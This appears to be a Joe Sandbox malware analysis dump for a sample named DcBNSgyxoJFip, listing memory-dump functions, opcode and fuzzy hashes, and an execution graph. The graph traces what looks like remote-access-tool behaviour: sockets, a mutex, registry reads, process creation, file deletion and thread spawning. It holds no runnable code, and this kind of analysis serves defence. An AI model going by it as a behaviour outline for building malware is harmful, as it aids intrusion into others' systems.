                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 43fb6dc43253d3e8c3dc431371441c1a63e565799850c6ee3756d97b8f3a5f4c
                                                • Instruction ID: 3258467cea93c8df080bd37ba34a38347b9117e96b8e28eceea48fe356deeb61
                                                • Opcode Fuzzy Hash: 43fb6dc43253d3e8c3dc431371441c1a63e565799850c6ee3756d97b8f3a5f4c
                                                • Instruction Fuzzy Hash: 8C1129719003499FDF10DFAAC845BDFBBF5AF88320F148419E515A7250C775A950CFA5
                                                Function 070DE130 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 81a378e0321c0e4200bb490647d0e64791dcb96680e92c2f05623631e927ee7b
                                                • Instruction ID: b49b9a58d0d9143e6f1b03c753629acb0c2f2b35a403b82853c61ab475c31340
                                                • Opcode Fuzzy Hash: 81a378e0321c0e4200bb490647d0e64791dcb96680e92c2f05623631e927ee7b
                                                • Instruction Fuzzy Hash: 5C113AB1D003498FDB20DFAAC8457AEFBF4AF88724F248459D519A7240CB75A940CF95
                                                Function 0EB91200 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0EB91265
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2210894003.000000000EB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EB90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_eb90000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 877b9e5c30ba2e6b3b8a65391935297a5bc2b1c8de1df3bf0d69f0cc0ab9670f
                                                • Instruction ID: 5d65e00fd1e66c992a9abe7c9e73268957d162638e798f64992126e1d3dec940
                                                • Opcode Fuzzy Hash: 877b9e5c30ba2e6b3b8a65391935297a5bc2b1c8de1df3bf0d69f0cc0ab9670f
                                                • Instruction Fuzzy Hash: 1011F2B58003499FDB20DF99D585BEEBFF4EB48324F20845AD558A3210C375A945CFA1
                                                Function 015BAF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015BAFBE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6693c9e67edd957349efb47e061fd37f295e0901678a536a40225902d2dabdad
                                                • Instruction ID: 1afb2fd879a98c93402033243f9b40910268fea09600f873c75e170537bbb088
                                                • Opcode Fuzzy Hash: 6693c9e67edd957349efb47e061fd37f295e0901678a536a40225902d2dabdad
                                                • Instruction Fuzzy Hash: FB1110B6C003498FDB10CF9AC444BDEFBF4BF88224F10841AD529A7650D379A545CFA1
                                                Function 015BAF57 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015BAFBE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9c64aecca3ba61c625261a77858cacb6575465519133c76bde62318e75a30e93
                                                • Instruction ID: d17f4d034135f2eaeccb8525226f3488a93c77cc1d82938996372d6519dc27b3
                                                • Opcode Fuzzy Hash: 9c64aecca3ba61c625261a77858cacb6575465519133c76bde62318e75a30e93
                                                • Instruction Fuzzy Hash: B11113B5C002498FDB20CF9AD484BDEFBF4BF88324F10845AD469A7650C379A545CFA0
                                                Function 0EB91208 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0EB91265
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2210894003.000000000EB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EB90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_eb90000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 493837af03cc46c0836387090a5c008ff52c65af38e6cea823a1c2628cf0305c
                                                • Instruction ID: 14383460c16cc91f0915ea4804677e933b58448dccc5614a6cde304e2023ea2e
                                                • Opcode Fuzzy Hash: 493837af03cc46c0836387090a5c008ff52c65af38e6cea823a1c2628cf0305c
                                                • Instruction Fuzzy Hash: 1C11FEB58003499FDB10DF9AC985BDEBBF8EB48324F20845AE518A3210C3B5A944CFA1
                                                Function 0127D4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd1d7ad4c51c1757f90eea392bf3eac1d5519f278fed3721957ae64cf37dbd0c
                                                • Instruction ID: ef2b34cebffbd4ab2f3e28a7121e24e9d6619160a8e396d0906bbf83043b9fab
                                                • Opcode Fuzzy Hash: fd1d7ad4c51c1757f90eea392bf3eac1d5519f278fed3721957ae64cf37dbd0c
                                                • Instruction Fuzzy Hash: AC213372510248EFDB05DF54E9C0B27BF61FF88328F20C169EA090B256C376D416CAA1
                                                Function 0127D3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7fd03b0172673a3f9bcec015ba363d6fcb5785020cc02dccfdbbd487df6a6f7
                                                • Instruction ID: 310b8a1456ee78460ad87bc2eccd4bfc3e8ae973bbc712ff1afb211e0f4d1aaa
                                                • Opcode Fuzzy Hash: e7fd03b0172673a3f9bcec015ba363d6fcb5785020cc02dccfdbbd487df6a6f7
                                                • Instruction Fuzzy Hash: B12145B6110208EFDB05DF44D9C0B67BF65FF88324F20C16CEA0A0B256C376E456CAA1
                                                Function 0128D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 771c82b6447db7e78866c0fdbfaf2a3ab5fb3f1331d968206e75f62f0b7c7fd5
                                                • Instruction ID: 7433604bfd34bf282eada8ab044cfef73c69dee5f3c8cb913c9e14997361e761
                                                • Opcode Fuzzy Hash: 771c82b6447db7e78866c0fdbfaf2a3ab5fb3f1331d968206e75f62f0b7c7fd5
                                                • Instruction Fuzzy Hash: 02212275614308EFDB15EFA4D9C0B26BB61FB84314F20C56DDA0A4B2D2C77AD40BCA61
                                                Function 0128D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cf14b4dc40b590b38000cd0f6b0680534d31d01a7648301d64004179d18cab4
                                                • Instruction ID: 74090e68abad943ee69ca396b3cdc03ad72231f00812f7ae649a7c13528229f8
                                                • Opcode Fuzzy Hash: 6cf14b4dc40b590b38000cd0f6b0680534d31d01a7648301d64004179d18cab4
                                                • Instruction Fuzzy Hash: 4F213775524208EFDB05EF94D5C0F25BB61FB84324F20C56DD9094B2DBC376D80ACA61
                                                Function 0127D4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: e37da4d5c37e2a78e773ffa43db2b91d0571a596d604637588ca0e68cd8e5660
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: 2411DF76404284CFCB12CF54D5C0B16BF71FB84328F24C6A9D9490B256C33AD45ACBA1
                                                Function 0127D3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: 183a8c248c36ea0e2038e5d55f373fb26ca9b8628aa7d337581744fc8b2c54fe
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: 8111DFB6404285DFCB02CF44D5C0B56BF71FB84324F24C2A9D9090B257C33AE456CBA1
                                                Function 0128D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: fafcbb7d3d7162cec0a08ca21de5f3e15f86871e620c00dbae7d963cd3bc0e45
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: EF11BB75504288DFDB02DF54C5C0B15BBA1FB84324F24C6A9D9494B2ABC33AD41ACB61
                                                Function 0128D017 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: c032590b11251f37af7129600c4475be3fc1c3dc8f4d83157da56ec5f510081f
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: 1011BB75504288CFDB12DF54D5C4B15BBA2FB84314F24C6AAD9494B696C33AD40BCBA2

                                                Execution Graph

                                                Execution Coverage:1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.1%
                                                Total number of Nodes:531
                                                Total number of Limit Nodes:19
                                                execution_graph 46808 4047eb WaitForSingleObject 46809 404805 SetEvent CloseHandle 46808->46809 46810 40481c closesocket 46808->46810 46811 40489c 46809->46811 46812 404829 46810->46812 46813 40483f 46812->46813 46821 404ab1 83 API calls 46812->46821 46815 404851 WaitForSingleObject 46813->46815 46816 404892 SetEvent CloseHandle 46813->46816 46822 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46815->46822 46816->46811 46818 404860 SetEvent WaitForSingleObject 46823 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46818->46823 46820 404878 SetEvent CloseHandle CloseHandle 46820->46816 46821->46813 46822->46818 46823->46820 46824 402bcc 46825 402bd7 46824->46825 46826 402bdf 46824->46826 46842 403315 28 API calls __Getctype 46825->46842 46828 402beb 46826->46828 46832 4015d3 46826->46832 46829 402bdd 46836 43360d 46832->46836 46834 402be9 46836->46834 46838 43362e std::_Facet_Register 46836->46838 46843 43a88c 46836->46843 46850 442200 7 API calls 2 library calls 46836->46850 46837 433dec std::_Facet_Register 46852 437bd7 RaiseException 46837->46852 46838->46837 46851 437bd7 RaiseException 46838->46851 46840 433e09 46842->46829 46845 446aff _strftime 46843->46845 46844 446b3d 46854 445354 20 API calls __dosmaperr 46844->46854 46845->46844 46847 446b28 RtlAllocateHeap 46845->46847 46853 442200 7 API calls 2 library calls 46845->46853 46847->46845 46848 446b3b 46847->46848 46848->46836 46850->46836 46851->46837 46852->46840 46853->46845 46854->46848 46855 4339be 46856 4339ca ___DestructExceptionObject 46855->46856 46887 4336b3 46856->46887 46858 4339d1 46859 433b24 46858->46859 46862 4339fb 46858->46862 47183 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46859->47183 46861 433b2b 47174 4426be 46861->47174 46873 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46862->46873 47177 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46862->47177 46867 433a14 46869 433a1a 46867->46869 47178 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46867->47178 46871 433a9b 46898 433c5e 46871->46898 46873->46871 47179 43edf4 35 API calls 3 library calls 46873->47179 46881 433abd 46881->46861 46882 433ac1 46881->46882 46883 433aca 46882->46883 47181 442661 28 API calls _abort 46882->47181 47182 433842 13 API calls 2 library calls 46883->47182 46886 433ad2 46886->46869 46888 4336bc 46887->46888 47185 433e0a IsProcessorFeaturePresent 46888->47185 46890 4336c8 47186 4379ee 10 API calls 3 library calls 46890->47186 46892 4336cd 46893 4336d1 46892->46893 47187 44335e 46892->47187 46893->46858 46896 4336e8 46896->46858 47253 436050 46898->47253 46900 433c71 GetStartupInfoW 46901 433aa1 46900->46901 46902 443422 46901->46902 47254 44ddc9 46902->47254 46904 433aaa 46907 40d767 46904->46907 46905 44342b 46905->46904 47258 44e0d3 35 API calls 46905->47258 47260 41bce3 LoadLibraryA GetProcAddress 46907->47260 46909 40d783 GetModuleFileNameW 47265 40e168 46909->47265 46911 40d79f 47280 401fbd 46911->47280 46914 401fbd 28 API calls 46915 40d7bd 46914->46915 47284 41afc3 46915->47284 46919 40d7cf 47306 401d8c 11 API calls 46919->47306 46921 40d7d8 46922 40d835 46921->46922 46923 40d7eb 46921->46923 47307 401d64 22 API calls 46922->47307 47327 40e986 111 API calls 46923->47327 46926 40d845 47308 401d64 22 API calls 46926->47308 46927 40d7fd 47328 401d64 22 API calls 46927->47328 46930 40d864 47309 404cbf 28 API calls 46930->47309 46931 40d809 47329 40e937 65 API calls 46931->47329 46933 40d873 47310 405ce6 28 API calls 46933->47310 46936 40d87f 47311 401eef 46936->47311 46937 40d824 47330 40e155 65 API calls 46937->47330 46940 40d88b 47315 401eea 46940->47315 46942 40d894 46944 401eea 11 API calls 46942->46944 46943 401eea 11 API calls 46945 40dc9f 46943->46945 46946 40d89d 46944->46946 47180 433c94 GetModuleHandleW 46945->47180 47319 401d64 22 API calls 46946->47319 46948 40d8a6 47320 401ebd 28 API calls 46948->47320 46950 40d8b1 47321 401d64 22 API calls 46950->47321 46952 40d8ca 47322 401d64 22 API calls 46952->47322 46954 40d946 46971 40e134 46954->46971 47323 401d64 22 API calls 46954->47323 46955 40d8e5 46955->46954 47331 4085b4 28 API calls 46955->47331 46958 40d912 46959 401eef 11 API calls 46958->46959 46960 40d91e 46959->46960 46963 401eea 11 API calls 46960->46963 46961 40d9a4 47324 40bed7 46961->47324 46962 40d95d 46962->46961 47333 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46962->47333 46965 40d927 46963->46965 47332 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46965->47332 46966 40d9aa 46967 40d82d 46966->46967 47335 41a463 33 API calls 46966->47335 46967->46943 47421 412902 30 API calls 46971->47421 46972 40d9c5 46974 40da18 46972->46974 47336 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 46972->47336 46973 40d988 46973->46961 47334 412902 30 API calls 46973->47334 47341 401d64 22 API calls 46974->47341 46979 40da21 46988 40da32 46979->46988 46989 40da2d 46979->46989 46980 40d9e0 46982 40d9e4 46980->46982 46983 40d9ee 46980->46983 46981 40e14a 47422 4112b5 64 API calls ___scrt_fastfail 46981->47422 47337 40699d 30 API calls 46982->47337 47339 401d64 22 API calls 46983->47339 47343 401d64 22 API calls 46988->47343 47342 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46989->47342 46990 40d9e9 47338 4064d0 97 API calls 46990->47338 46994 40da3b 47344 41ae08 28 API calls 46994->47344 46996 40d9f7 46996->46974 46999 40da13 46996->46999 46997 40da46 47345 401e18 11 API calls 46997->47345 47340 4064d0 97 API calls 46999->47340 47000 40da51 47346 401e13 11 API calls 47000->47346 47003 40da5a 47347 401d64 22 API calls 47003->47347 47005 40da63 47348 401d64 22 API calls 47005->47348 47007 40da7d 47349 401d64 22 API calls 47007->47349 47009 40da97 47350 401d64 22 API calls 47009->47350 47011 40db22 47013 40db2c 47011->47013 47020 40dcaa ___scrt_fastfail 47011->47020 47012 40dab0 47012->47011 47351 401d64 22 API calls 47012->47351 47015 40db35 47013->47015 47021 40dbb1 47013->47021 47357 401d64 22 API calls 47015->47357 47017 40db3e 47358 401d64 22 API calls 47017->47358 47018 40dac5 _wcslen 47018->47011 47352 401d64 22 API calls 47018->47352 47368 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47020->47368 47045 40dbac ___scrt_fastfail 47021->47045 47023 40db50 47359 401d64 22 API calls 47023->47359 47024 40dae0 47353 401d64 22 API calls 47024->47353 47027 40db62 47360 401d64 22 API calls 47027->47360 47029 40daf5 47354 40c89e 31 API calls 47029->47354 47030 40dcef 47369 401d64 22 API calls 47030->47369 47033 40db8b 47361 401d64 22 API calls 47033->47361 47034 40dd16 47370 401f66 28 API calls 47034->47370 47036 40db08 47355 401e18 11 API calls 47036->47355 47038 40db14 47356 401e13 11 API calls 47038->47356 47042 40db9c 47362 40bc67 45 API calls _wcslen 47042->47362 47043 40dd25 47371 4126d2 14 API calls 47043->47371 47044 40db1d 47044->47011 47045->47021 47363 4128a2 31 API calls 47045->47363 47049 40dd3b 47372 401d64 22 API calls 47049->47372 47050 40dc45 ctype 47364 401d64 22 API calls 47050->47364 47052 40dd47 47373 43a5e7 39 API calls _strftime 47052->47373 47055 40dd54 47057 40dd81 47055->47057 47374 41beb0 86 API calls ___scrt_fastfail 47055->47374 47056 40dc5c 47056->47030 47365 401d64 22 API calls 47056->47365 47375 401f66 28 API calls 47057->47375 47060 40dc7e 47366 41ae08 28 API calls 47060->47366 47062 40dd65 CreateThread 47062->47057 47486 41c96f 10 API calls 47062->47486 47064 40dd96 47376 401f66 28 API calls 47064->47376 47065 40dc87 47367 40e219 109 API calls 47065->47367 47068 40dda5 47377 41a686 79 API calls 47068->47377 47069 40dc8c 47069->47030 47071 40dc93 47069->47071 47071->46967 47072 40ddaa 47378 401d64 22 API calls 47072->47378 47074 40ddb6 47379 401d64 22 API calls 47074->47379 47076 40ddcb 47380 401d64 22 API calls 47076->47380 47078 40ddeb 47381 43a5e7 39 API calls _strftime 47078->47381 47080 40ddf8 47382 401d64 22 API calls 47080->47382 47082 40de03 47383 401d64 22 API calls 47082->47383 47084 40de14 47384 401d64 22 API calls 47084->47384 47086 40de29 47385 401d64 22 API calls 47086->47385 47088 40de3a 47089 40de41 StrToIntA 47088->47089 47386 409517 141 API calls _wcslen 47089->47386 47091 40de53 47387 401d64 22 API calls 47091->47387 47093 40dea1 47390 401d64 22 API calls 47093->47390 47094 40de5c 47094->47093 47388 43360d 22 API calls 3 library calls 47094->47388 47097 40de71 47389 401d64 22 API calls 47097->47389 47099 40de84 47102 40de8b CreateThread 47099->47102 47100 40def9 47393 401d64 22 API calls 47100->47393 47101 40deb1 47101->47100 47391 43360d 22 API calls 3 library calls 47101->47391 47102->47093 47490 419128 102 API calls 2 library calls 47102->47490 47105 40dec6 47392 401d64 22 API calls 47105->47392 47107 40ded8 47112 40dedf CreateThread 47107->47112 47108 40df6c 47399 401d64 22 API calls 47108->47399 47109 40df02 47109->47108 47394 401d64 22 API calls 47109->47394 47112->47100 47487 419128 102 API calls 2 library calls 47112->47487 47113 40df1e 47395 401d64 22 API calls 47113->47395 47114 40df75 47115 40dfba 47114->47115 47400 401d64 22 API calls 47114->47400 47404 41a7a2 29 API calls 47115->47404 47119 40df33 47396 40c854 31 API calls 47119->47396 47120 40dfc3 47405 401e18 11 API calls 47120->47405 47121 40df8a 47401 401d64 22 API calls 47121->47401 47123 40dfce 47406 401e13 11 API calls 47123->47406 47127 40df46 47397 401e18 11 API calls 47127->47397 47128 40dfd7 CreateThread 47133 40e004 47128->47133 47134 40dff8 CreateThread 47128->47134 47488 40e54f 82 API calls 47128->47488 47129 40df9f 47402 43a5e7 39 API calls _strftime 47129->47402 47132 40df52 47398 401e13 11 API calls 47132->47398 47137 40e019 47133->47137 47138 40e00d CreateThread 47133->47138 47134->47133 47489 410f36 138 API calls 47134->47489 47136 40df5b CreateThread 47136->47108 47484 40196b 49 API calls _strftime 47136->47484 47141 40e073 47137->47141 47407 401f66 28 API calls 47137->47407 47138->47137 47485 411524 38 API calls ___scrt_fastfail 47138->47485 47140 40dfac 47403 40b95c 7 API calls 47140->47403 47411 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47141->47411 47144 40e046 47408 404c9e 28 API calls 47144->47408 47147 40e08b 47149 40e12a 47147->47149 47412 41ae08 28 API calls 47147->47412 47148 40e053 47409 401f66 28 API calls 47148->47409 47419 40cbac 27 API calls 47149->47419 47152 40e062 47410 41a686 79 API calls 47152->47410 47154 40e0a4 47413 412584 31 API calls 47154->47413 47156 40e12f 47420 413fd4 168 API calls _strftime 47156->47420 47157 40e067 47159 401eea 11 API calls 47157->47159 47159->47141 47161 40e0ba 47414 401e13 11 API calls 47161->47414 47163 40e0ed DeleteFileW 47164 40e0f4 47163->47164 47165 40e0c5 47163->47165 47415 41ae08 28 API calls 47164->47415 47165->47163 47165->47164 47167 40e0db Sleep 47165->47167 47167->47165 47168 40e104 47416 41297a RegOpenKeyExW RegDeleteValueW 47168->47416 47170 40e117 47417 401e13 11 API calls 47170->47417 47172 40e121 47418 401e13 11 API calls 47172->47418 47492 44243b 47174->47492 47177->46867 47178->46873 47179->46871 47180->46881 47181->46883 47182->46886 47183->46861 47185->46890 47186->46892 47191 44e949 47187->47191 47190 437a17 8 API calls 3 library calls 47190->46893 47194 44e966 47191->47194 47195 44e962 47191->47195 47193 4336da 47193->46896 47193->47190 47194->47195 47197 4489ad 47194->47197 47209 433d2c 47195->47209 47198 4489b9 ___DestructExceptionObject 47197->47198 47216 444acc EnterCriticalSection 47198->47216 47200 4489c0 47217 44ef64 47200->47217 47202 4489cf 47203 4489de 47202->47203 47228 448841 23 API calls 47202->47228 47230 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 47203->47230 47206 4489d9 47229 4488f7 GetStdHandle GetFileType 47206->47229 47207 4489ef std::_Locinfo::_Locinfo_ctor 47207->47194 47210 433d37 IsProcessorFeaturePresent 47209->47210 47211 433d35 47209->47211 47213 4341a4 47210->47213 47211->47193 47252 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47213->47252 47215 434287 47215->47193 47216->47200 47218 44ef70 ___DestructExceptionObject 47217->47218 47219 44ef94 47218->47219 47220 44ef7d 47218->47220 47231 444acc EnterCriticalSection 47219->47231 47239 445354 20 API calls __dosmaperr 47220->47239 47223 44efcc 47240 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 47223->47240 47224 44efa0 47224->47223 47232 44eeb5 47224->47232 47226 44ef82 __cftof std::_Locinfo::_Locinfo_ctor 47226->47202 47228->47206 47229->47203 47230->47207 47231->47224 47241 448706 47232->47241 47234 44eec7 47238 44eed4 47234->47238 47248 44772e 11 API calls 2 library calls 47234->47248 47236 44ef26 47236->47224 47249 446ac5 20 API calls __dosmaperr 47238->47249 47239->47226 47240->47226 47246 448713 _strftime 47241->47246 47242 448753 47251 445354 20 API calls __dosmaperr 47242->47251 47243 44873e RtlAllocateHeap 47244 448751 47243->47244 47243->47246 47244->47234 47246->47242 47246->47243 47250 442200 7 API calls 2 library calls 47246->47250 47248->47234 47249->47236 47250->47246 47251->47244 47252->47215 47253->46900 47255 44dddb 47254->47255 47256 44ddd2 47254->47256 47255->46905 47259 44dcc8 48 API calls 5 library calls 47256->47259 47258->46905 47259->47255 47261 41bd22 LoadLibraryA GetProcAddress 47260->47261 47262 41bd12 GetModuleHandleA GetProcAddress 47260->47262 47263 41bd4b 32 API calls 47261->47263 47264 41bd3b LoadLibraryA GetProcAddress 47261->47264 47262->47261 47263->46909 47264->47263 47423 41a63f FindResourceA 47265->47423 47268 43a88c ___crtLCMapStringA 21 API calls 47269 40e192 ctype 47268->47269 47426 401f86 47269->47426 47272 401eef 11 API calls 47273 40e1b8 47272->47273 47274 401eea 11 API calls 47273->47274 47275 40e1c1 47274->47275 47276 43a88c ___crtLCMapStringA 21 API calls 47275->47276 47277 40e1d2 ctype 47276->47277 47430 406052 47277->47430 47279 40e205 47279->46911 47281 401fcc 47280->47281 47438 402501 47281->47438 47283 401fea 47283->46914 47304 41afd6 47284->47304 47285 41b046 47286 401eea 11 API calls 47285->47286 47287 41b078 47286->47287 47288 401eea 11 API calls 47287->47288 47290 41b080 47288->47290 47289 41b048 47451 403b60 28 API calls 47289->47451 47293 401eea 11 API calls 47290->47293 47295 40d7c6 47293->47295 47294 41b054 47296 401eef 11 API calls 47294->47296 47305 40e8bd 11 API calls 47295->47305 47298 41b05d 47296->47298 47297 401eef 11 API calls 47297->47304 47299 401eea 11 API calls 47298->47299 47301 41b065 47299->47301 47300 401eea 11 API calls 47300->47304 47303 41bfa9 28 API calls 47301->47303 47303->47285 47304->47285 47304->47289 47304->47297 47304->47300 47443 403b60 28 API calls 47304->47443 47444 41bfa9 47304->47444 47305->46919 47306->46921 47307->46926 47308->46930 47309->46933 47310->46936 47312 401efe 47311->47312 47314 401f0a 47312->47314 47479 4021b9 11 API calls 47312->47479 47314->46940 47317 4021b9 47315->47317 47316 4021e8 47316->46942 47317->47316 47480 40262e 11 API calls _Deallocate 47317->47480 47319->46948 47320->46950 47321->46952 47322->46955 47323->46962 47481 401e8f 47324->47481 47326 40bee1 CreateMutexA GetLastError 47326->46966 47327->46927 47328->46931 47329->46937 47331->46958 47332->46954 47333->46973 47334->46961 47335->46972 47336->46980 47337->46990 47338->46983 47339->46996 47340->46974 47341->46979 47342->46988 47343->46994 47344->46997 47345->47000 47346->47003 47347->47005 47348->47007 47349->47009 47350->47012 47351->47018 47352->47024 47353->47029 47354->47036 47355->47038 47356->47044 47357->47017 47358->47023 47359->47027 47360->47033 47361->47042 47362->47045 47363->47050 47364->47056 47365->47060 47366->47065 47367->47069 47368->47030 47369->47034 47370->47043 47371->47049 47372->47052 47373->47055 47374->47062 47375->47064 47376->47068 47377->47072 47378->47074 47379->47076 47380->47078 47381->47080 47382->47082 47383->47084 47384->47086 47385->47088 47386->47091 47387->47094 47388->47097 47389->47099 47390->47101 47391->47105 47392->47107 47393->47109 47394->47113 47395->47119 47396->47127 47397->47132 47398->47136 47399->47114 47400->47121 